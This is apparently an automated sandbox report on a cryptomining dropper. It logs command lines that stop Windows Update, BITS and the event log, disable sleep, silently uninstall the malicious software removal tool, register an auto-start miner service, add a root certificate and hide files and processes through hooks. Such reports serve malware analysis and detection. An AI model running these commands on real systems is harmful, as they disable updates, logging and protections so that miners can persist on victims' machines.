Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\kx new.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\kx new.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\kx new.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: kx new.exeStatic file information: File size 10948608 > 1048576
Source: kx new.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa70000
Source: Binary string: T].PdBB?0_$u3J~7 source: kx new.exe, 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmp, kx new.exe, 00000000.00000001.1426821105.0000000000402000.00000002.00000001.01000000.00000003.sdmp
Source: Kawpow new.exe.0.drStatic PE information: section name: .00cfg
Source: xmr new.exe.0.drStatic PE information: section name: .00cfg
Source: eejhedztifcv.exe.6.drStatic PE information: section name: .00cfg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F142A8 push ebx; ret 2_2_04F142DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F16F1C pushad ; ret 2_2_04F16F23
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF7ACDD push rcx; retf 003Fh10_2_000002534CF7ACDE
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA60F0 push rbp; retf 10_2_000002534CFA60F3
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA60E0 push r14; retf 10_2_000002534CFA60EB
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA60A8 push rbp; retf 10_2_000002534CFA60AB
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6080 push rbp; retf 10_2_000002534CFA6083
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6078 push rbp; retf 10_2_000002534CFA6083
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6070 push rbp; retf 10_2_000002534CFA6073
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6038 push r14; retf 10_2_000002534CFA6043
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6168 push rsi; retf 10_2_000002534CFA61D3
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6198 push rbp; retf 10_2_000002534CFA619B
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6180 push rbp; retf 10_2_000002534CFA6183
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6168 push rsi; retf 10_2_000002534CFA61D3
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6160 push rbp; retf 10_2_000002534CFA6163
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6138 push rsi; retf 10_2_000002534CFA6143
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6130 push rbp; retf 10_2_000002534CFA6133
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFAC6DD push rcx; retf 003Fh10_2_000002534CFAC6DE
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA62C8 push rbp; retf 10_2_000002534CFA62B3
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA62C8 push rbp; retf 10_2_000002534CFA62CB
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA62B0 push rbp; retf 10_2_000002534CFA62B3
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6238 push rbp; retf 10_2_000002534CFA623B
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6218 push rbp; retf 10_2_000002534CFA621B
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA6208 push rsi; retf 10_2_000002534CFA620B
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E99173ACDD push rcx; retf 003Fh59_2_000002E99173ACDE
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E99176C6DD push rcx; retf 003Fh59_2_000002E99176C6DE
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991759FA4 push rbp; retf 59_2_000002E99176626B
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991766130 push rbp; retf 59_2_000002E991766133
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991766138 push rsi; retf 59_2_000002E991766143
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991766100 push rbp; retf 59_2_000002E99176610B
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991766100 push rbp; retf 59_2_000002E99176610B

Persistence and Installation Behavior

barindex
Installs new ROOT certificates
Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\kx new.exeFile created: C:\Users\user\AppData\Local\Temp\xmr new.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file
Source: C:\Users\user\Desktop\kx new.exeFile created: C:\Users\user\AppData\Local\Temp\Kawpow new.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

barindex
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
